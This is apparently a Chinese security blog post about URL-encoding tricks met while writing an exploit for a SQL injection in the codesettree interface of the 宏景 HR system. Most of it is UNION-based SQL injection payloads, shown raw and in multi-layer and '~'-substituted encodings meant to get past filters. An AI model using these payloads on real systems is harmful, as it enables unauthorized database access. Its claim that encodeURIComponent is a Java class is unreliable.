URL 编码问题

Gryffinbit
写 exp 遇到的问题

发布于:2023年10月19日
次浏览

漏洞录入《宏景人力资源信息管理系统 codesettree 接口 SQL 注入漏洞》,汲取的灵感。

那个编码,对一些特殊字符,用百分号+十六进制的骚方法。。。。先普通url一次之后,再对一些特殊字符编码。
他不是简单的多次url编码。这是另一种url编码。叫encodeURIComponent,这是java中的一个类。

java对url编码有两种方式,一个是encodeURI,一个是encodeURIComponent

然后我发现,encodeURI的方式,就不会解码%2C。也就是不会对,这些特殊字符进行编码

URL Decode Online | URLDecoder

一个实例

1' union all select 849754578,(select @@VERSION) --

进行第一次url编码,整体编码。URL Encode Online | URLEncoder

1%27%20union%20all%20select%20849754578%2C%28select%20%40%40VERSION%29%20--

会发现,数字部分以及--部分没有被编码,所以需要找16进制对应的部分,加上%,再次编码

%31%27%20union%20all%20select%20%38%34%39%37%35%34%35%37%38%2C%28select%20%40%40VERSION%29%20%2d%2d

有必要的话,还需要将%换成~

~31~27~20union~20all~20select~20~38~34~39~37~35~34~35~37~38~2c~28select~20~40~40VERSION~29~20~2d~2d

然后这一串,就可以去get,在burp发送数据包了

多次url编码实例

多次 url 编码,是多次16进制的编码

最终编码结果

%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%32%25%36%35%25%32%35%25%33%36%25%33%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%35%25%36%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%31%25%32%35%25%33%36%25%36%33%25%32%35%25%33%37%25%33%36%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%32%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%34%25%33%38%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%38%25%32%35%25%33%34%25%33%32%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%36%34%25%32%35%25%33%34%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31%25%32%35%25%33%33%25%33%32%25%32%35%25%33%33%25%33%33%25%32%35%25%33%33%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31

解码一次

%25%33%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%33%25%37%39%25%37%33%25%32%65%25%36%36%25%36%65%25%35%66%25%37%33%25%37%31%25%36%63%25%37%36%25%36%31%25%37%32%25%36%32%25%36%31%25%37%33%25%36%35%25%37%34%25%36%66%25%37%33%25%37%34%25%37%32%25%32%38%25%34%38%25%36%31%25%37%33%25%36%38%25%34%32%25%37%39%25%37%34%25%36%35%25%37%33%25%32%38%25%32%37%25%34%64%25%34%34%25%33%35%25%32%37%25%32%63%25%32%37%25%33%31%25%33%32%25%33%33%25%33%34%25%33%35%25%33%36%25%32%37%25%32%39%25%32%39%25%32%39%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%37%25%33%31

解码两次

%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%73%65%6c%65%63%74%20%73%79%73%2e%66%6e%5f%73%71%6c%76%61%72%62%61%73%65%74%6f%73%74%72%28%48%61%73%68%42%79%74%65%73%28%27%4d%44%35%27%2c%27%31%32%33%34%35%36%27%29%29%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%31

解码三次

1' union select 1%2c(select sys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'123456'))) union select 1%2c'1

原始payload

1' union select 1,(select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))) union select 1,'1

正向编码实例

注意!每一次编码过后,原本的特殊字符编码,不要再次编码,比如,是%2c,不要对他进行重复编码。

原始 payload

1' union select 1,(select @@VERSION) union select 1,'1

对特殊字符进行编码

1' union select 1%2c(select %40%40VERSION) union select 1%2c'1

第一次编码

hex之后,在前面加百分号,正则匹配【find:(..) replace:%\1】

注意,%2c %40不编码

%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%73%65%6c%65%63%74%20%40%40%56%45%52%53%49%4f%4e%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%31

第二次编码

直接把上面那段,放进hex之后,加%就可以

16进制转换,16进制转换文本字符串,在线16进制转换 | 在线工具 (sojson.com)

%25%33%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%35%36%25%34%35%25%35%32%25%35%33%25%34%39%25%34%66%25%34%65%25%32%39%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%37%25%33%31

第三次编码

丢进hex

%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31

博客内容遵循 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 协议

本文永久链接是:https://gryffinbit.top/20231019/URL%20%E7%BC%96%E7%A0%81%E9%97%AE%E9%A2%98/

更新于:2023年10月19日

URL

评论